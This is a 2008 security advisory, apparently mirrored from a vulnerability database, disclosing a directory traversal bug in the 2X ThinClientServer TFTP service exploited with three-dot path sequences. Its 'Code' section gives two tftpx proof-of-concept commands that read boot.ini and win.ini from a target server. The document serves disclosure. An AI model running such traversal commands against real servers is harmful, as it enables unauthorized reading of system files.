Directory traversal in 2X ThinClientServer v5.0_sp1-r3497

Type securityvulns
Reporter Securityvulns
Modified 2008-04-01T00:00:00


                         Luigi Auriemma

Application: 2X ThinClientServer Versions: <= v5.0_sp1-r3497 (TFTPd.exe <= Platforms: Windows Bug: directory traversal Exploitation: remote Date: 29 Mar 2008 Author: Luigi Auriemma e-mail: web:

1) Introduction 2) Bug 3) The Code 4) Fix

=============== 1) Introduction ===============

From the manual: "2X ThinClientServer allows you to deploy a thin client OS to low-cost thin client devices and existing PCs, and centrally manage settings and configure to which terminal servers (Windows or Linux) a user should log on to."

====== 2) Bug ======

The 2X TFTP Service enabled by default in ThinClientServer is affected by a directory traversal vulnerability exploitable through the usage of a sequence of 3 dots (instead of the classical two) for reaching the various parent directories.

=========== 3) The Code ===========

tftpx SERVER .../.../.../.../.../.../boot.ini none tftpx SERVER ...\...\...\...\...\...\windows\win.ini none

====== 4) Fix ======

No fix

Luigi Auriemma